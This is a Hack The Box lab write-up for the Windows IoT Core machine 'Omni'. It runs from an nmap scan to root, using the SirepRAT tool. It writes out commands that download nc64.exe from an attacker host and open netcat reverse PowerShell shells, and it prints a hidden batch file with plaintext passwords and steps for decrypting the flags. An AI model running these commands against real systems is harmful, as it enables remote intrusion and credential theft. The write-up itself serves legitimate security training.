NMAP:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-24 11:07 EST
Nmap scan report for 10.10.10.204
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn’t have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.94 seconds
So, port 135 and 8080 are opened.
In port 135 Microsoft windows rpc runningMicrosoft Windows RPC
This protocol is developed to provide a transparent communication so that the
clients could directly communicate with the servers.
And the anotherone 8080 a webserver running on that port and the nmap
scan returns us its http-server-header: Microsoft-HTTPAPI/2.0
And the basic realm give us its Windows device portal
Looks like this is a IOT core device….
And after some searching I founded this Version of IoT can be exploited using
sirepRat
WEBSITE:
The web server is asking me creds to log in, I tried some default creds
nothing worked there
As I said above I’m going to use the sirepRat tool to gain a Shell
Here you go the SirepRat exploit
https://github.com/SafeBreach-Labs/SirepRAT
So all commands are there in the readme file… go through it…
I’m gonna try that one and pop a shell
pip install -r requirements.txt
run this first the all requirements will be satisfied 🙂
and if you get errors again then try this
pip2 install enum34
So here is my command
┌──(root💀Mywife)-[/home/…/htb/boxes/omni/SirepRAT] └─# python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output — cmd “C:\Windows\System32\cmd.exe” –args “/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.24:8080/nc64.exe” –v ——— ———
And in my python server
┌──(kali㉿Mywife)-[~/Exploits/nc]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …
10.10.10.204 – – [24/Dec/2020 12:52:10] “GET /nc64.exe HTTP/1.1” 200 –
My exploit got worked so now I’m gonna execute it…. 🙂
┌──(root💀Mywife)-[/home/…/htb/boxes/omni/SirepRAT]
└─# python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd
“C:\Windows\System32\cmd.exe” –args “/c cd
C:\Windows\System32\spool\drivers\color && nc64.exe 10.10.14.24 1234 -e
powershell.exe” –v——— ———
And I got a shell in my netcat listener
┌──(kali㉿Mywife)-[~/Documents/nc.exe]
└─$ nc -lvvnp 4444
listening on [any] 4444 …
connect to [10.10.14.158] from (UNKNOWN) [10.10.10.204] 49674
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32>
Looks like we can see the user.txt coz its encrypted
And we got shell only as $omni we need to privesc as another user to decrypt
it………..
After some time of enumeration I finded a hided file r.bat
That located in
PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> gci -hidden
gci -hidden
Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
Mode LastWriteTime Length Name
-a-h– 8/21/2020 12:56 PM 247 r.bat
PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off
:LOOP
for /F “skip=6” %%i in (‘net localgroup “administrators”‘) do net localgroup
“administrators” %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
USER PART:
I’m in 😀
And after some enum here I finded a place to run commands 🙂
After running this command there I got shell as app in my nc
Cd C:\Windows\System32\spool\drivers\color && nc64.exe 10.10.14.77 5555 -e
powershell.exe
┌──(kali㉿Mywife)-[~]
└─$ nc -lvvnp 5555
listening on [any] 5555 …
connect to [10.10.14.77] from (UNKNOWN) [10.10.10.204] 49674
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32\spool\drivers\color> $env:username
$env:username
app
We know that user,txt and root.txt are encrypted we need to decrypt them,
$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password
Use these commands
PS C:\Windows\system32\spool\drivers\color> $credential = Import-CliXml -Path U:\Users\app\user.txt $credential = Import-CliXml -Path U:\Users\app\user.txt PS C:\Windows\system32\spool\drivers\color>$credential.GetNetworkCredential().Password $credential.GetNetworkCredential().Password
7cfd1505ad9d70
Root part:
Same steps for root also, just we need to log as administrator in that web
portal and follow the same steps that we’ve used to get user.txt
First I’m going to log in…
It says failed to run the command but I’ve got shell as administrator on my
nc
Gonna run these commands to decrypt root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password
┌──(kali㉿Mywife)-[~]
└─$ nc -lvvnp 1234 listening on [any] 1234 … connect to [10.10.14.77] from (UNKNOWN) [10.10.10.204] 49681 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32\spool\drivers\color> $env:username $env:username Administrator PS C:\Windows\system32\spool\drivers\color> $credential = Import-CliXml -Path U:\Users\administrator\root.txt $credential = Import-CliXml -Path U:\Users\administrator\root.txt PS C:\Windows\system32\spool\drivers\color>$credential.GetNetworkCredential().Password $credential.GetNetworkCredential().Password
5dbdc6e9bf11d2321dca21
That’s all we’ve rooted!!!
Hope you liked my writeup, follow this blog for more cool writeups
See you soon Bye.
Jopraveen 